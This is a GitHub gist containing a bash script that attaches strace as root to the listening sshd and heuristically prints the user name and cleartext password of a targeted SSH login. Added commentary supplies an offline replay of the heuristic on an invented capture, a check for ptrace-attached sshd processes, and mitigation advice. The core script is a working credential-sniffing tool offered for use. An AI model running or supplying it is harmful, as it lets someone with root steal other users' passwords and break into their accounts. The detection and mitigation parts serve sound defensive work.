@vozlt
Last active May 22, 2019 10:07
SSH password sniffing
#! /bin/bash
#
# Cheap technique. :) by YoungJoo.Kim <http://vozlt.com>
#
# Attach strace (as root) to the listening sshd and follow every forked
# session.  During password authentication the unprivileged sshd child hands
# the user name and, a few messages later, the cleartext password to the
# privileged monitor over a descriptor, and both show up as write() calls.
# The script looks for the user name in a write(), remembers which pid made
# it, then prints later write()s from that pid whose length looks like the
# password message.  Output is heuristic: "MAY BE", not "IS".
#
SNOOP_ID=$1
SSHD_PPID=$(pgrep -o sshd)            # oldest sshd = the listening parent
MATCH_ID=
MATCH_PID=
MATCH_ID_PID=
PID_RE=
FIND_PASSWD=0
PASSWD_NEXT=15                        # password write usually ~15 lines after the user name
FILTER_PASSWD_LEN_MIN=40              # plausible line lengths for the password write
FILTER_PASSWD_LEN_MAX=80
SCOPE=10                              # search lines [PASSWD_NEXT-SCOPE, PASSWD_NEXT+SCOPE]
SCOPE_MIN=
SCOPE_MAX=
LOOP_COUNT=0
((SCOPE_MIN=PASSWD_NEXT-SCOPE))
((SCOPE_MAX=PASSWD_NEXT+SCOPE))
if [ -z "$SNOOP_ID" ]; then
    echo "Usage: $0 <username>" >&2
    exit 1
fi
if [ -z "$SSHD_PPID" ]; then
    echo "no sshd process found" >&2
    exit 1
fi
# strace prints to stderr, hence 2>&1.  'read' is used without -r on purpose:
# the backslash escapes strace prints ("\0\0\0\23...") are collapsed, and the
# length thresholds above were chosen against that collapsed form.
strace -f -e trace=write -s 64 -p "$SSHD_PPID" 2>&1 | while read SSH
do
    # Inside the window after the user name: report writes from the same pid
    if [ "$LOOP_COUNT" -ge "$SCOPE_MIN" ] && [ "$LOOP_COUNT" -le "$SCOPE_MAX" ]; then
        MATCH_PID=
        if [[ $SSH =~ $PID_RE && $SSH != *ssh-connection* ]]; then
            MATCH_PID=$SSH
        fi
        if [ -n "$MATCH_PID" ] && [ "${#SSH}" -lt "$FILTER_PASSWD_LEN_MAX" ] && [ "${#SSH}" -gt "$FILTER_PASSWD_LEN_MIN" ]; then
            echo "MAY BE PASSWORD >>> $SSH"
        fi
    fi
    # Window exhausted: go back to waiting for the user name
    if [ "$LOOP_COUNT" -eq "$SCOPE_MAX" ]; then
        LOOP_COUNT=0
        FIND_PASSWD=0
        MATCH_ID=
    fi
    if [ "$FIND_PASSWD" -gt 0 ]; then
        ((FIND_PASSWD++))
        ((LOOP_COUNT++))
        continue
    fi
    # strace closes the string argument with a double quote, so the user name
    # immediately followed by '"' marks the write() that carries it
    MATCH_ID=
    if [[ $SSH == *"$SNOOP_ID\""* ]]; then
        MATCH_ID=$SSH
    fi
    if [ -n "$MATCH_ID" ]; then
        echo "MAY BE USERID >>> $SSH"
        # with -f every line starts with "[pid NNNN]"; keep only the digits
        MATCH_ID_PID=${SSH%%]*}
        MATCH_ID_PID=${MATCH_ID_PID##*[[:space:]]}
        PID_RE="^\\[pid +${MATCH_ID_PID}\\]"
        FIND_PASSWD=1
    fi
done
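The gist only runs live against a real sshd, which makes the heuristic hard to inspect. The block below is an added example, not part of the gist: `replay_sniff` applies the same "user name write, then a later write from the same pid of password-like length" rule to a saved strace capture, and `traced_sshd` is the defensive counterpart, listing sshd processes that currently have a tracer attached by reading `TracerPid` from `/proc/<pid>/status`. The capture in `sample_capture` is constructed to look like `strace -f -e trace=write -s 64` output; the byte layout of the monitor messages and the `hunter2-pass` password are invented for the example and are not a real sshd trace. The window bounds and length thresholds are parameters, defaulting to the gist's 25-line window and 40..80 character range, but note that `awk` measures the raw line, whereas the gist measures it after `read` has collapsed the backslash escapes.

```shell
#!/bin/sh
# Added example (not from the gist): offline replay of the sniffing heuristic
# plus a check for sshd processes that are being ptraced.

# Constructed sample in the shape of 'strace -f -e trace=write -s 64' output.
# pid 4210 is the session that authenticates "vozlt"; pid 4211 is noise.
sample_capture() {
    cat <<'EOF'
[pid  4210] write(4, "\0\0\0\n\n\0\0\0\5vozlt", 14) = 14
[pid  4211] write(7, "SSH-2.0-OpenSSH\r\n", 17) = 17
[pid  4210] write(4, "\1\1", 2) = 2
[pid  4210] write(4, "\0\0\0\35\7\0\0\0\5vozlt\0\0\0\16ssh-connection\0\0\0\4none", 33) = 33
[pid  4211] write(7, "\0\0\0\20\f\0\0\0\13hunter2-pass", 20) = 20
[pid  4210] write(4, "\0\0\0\20\f\0\0\0\13hunter2-pass", 20) = 20
EOF
}

# replay_sniff USER FILE [LO] [HI] [MIN] [MAX]
# Prints "USERID<tab>pid<tab>line" for the write() carrying USER followed by
# the closing quote, then "PASSWD<tab>pid<tab>line" for every later write()
# from the same pid that lies LO..HI lines after it, is MIN..MAX characters
# long and does not mention ssh-connection (the service-request message).
replay_sniff() {
    user=$1 file=$2 lo=${3:-1} hi=${4:-25} min=${5:-40} max=${6:-80}
    awk -v user="$user" -v lo="$lo" -v hi="$hi" -v min="$min" -v max="$max" '
        # with -f strace prefixes every line with "[pid NNNN]"
        function pid_of(line,   m) {
            if (match(line, /^\[pid +[0-9]+\]/)) {
                m = substr(line, RSTART, RLENGTH)
                gsub(/[^0-9]/, "", m)
                return m
            }
            return ""
        }
        /write\(/ {
            pid = pid_of($0)
            if (target == "") {
                if (index($0, user "\"") > 0) {
                    target = pid; seen = 0
                    print "USERID\t" pid "\t" $0
                }
                next
            }
            seen++      # counts every write() line after the user name, any pid
            if (seen >= lo && seen <= hi && pid == target &&
                index($0, "ssh-connection") == 0 &&
                length($0) > min && length($0) < max)
                print "PASSWD\t" pid "\t" $0
            if (seen >= hi) target = ""
        }' "$file"
}

# traced_sshd [PROCROOT]
# Reports every process named sshd whose TracerPid is non-zero, i.e. that
# has strace/gdb/another ptrace client attached right now.  PROCROOT
# defaults to /proc and is a parameter only so the check can be exercised
# against a constructed tree.  Returns 0 if at least one traced sshd exists.
traced_sshd() {
    procroot=${1:-/proc}
    found=1
    for status in "$procroot"/[0-9]*/status; do
        [ -r "$status" ] || continue
        name=$(awk '$1 == "Name:" { print $2; exit }' "$status")
        tracer=$(awk '$1 == "TracerPid:" { print $2; exit }' "$status")
        if [ "$name" = "sshd" ] && [ -n "$tracer" ] && [ "$tracer" != "0" ]; then
            pid=${status%/status}
            pid=${pid##*/}
            echo "sshd pid $pid is being traced by pid $tracer"
            found=0
        fi
    done
    return $found
}

# usage: sample_capture > /tmp/cap.txt && replay_sniff vozlt /tmp/cap.txt
#        traced_sshd            # on a live host, as root
```

Run against the sample, `replay_sniff` reports exactly one USERID line and one PASSWD line, both from pid 4210; the identical-looking write from pid 4211 and the `ssh-connection` message are dropped, which is the whole point of keying on the pid. `traced_sshd` only tells you that someone is attached at the moment you look; a polling cron job or an audit rule on `ptrace` syscalls is what catches the attacker who detaches after harvesting. The technique needs root to attach to sshd at all, so the realistic mitigation is limiting who can get root, with `kernel.yama.ptrace_scope` raised as defence in depth where the Yama LSM is available.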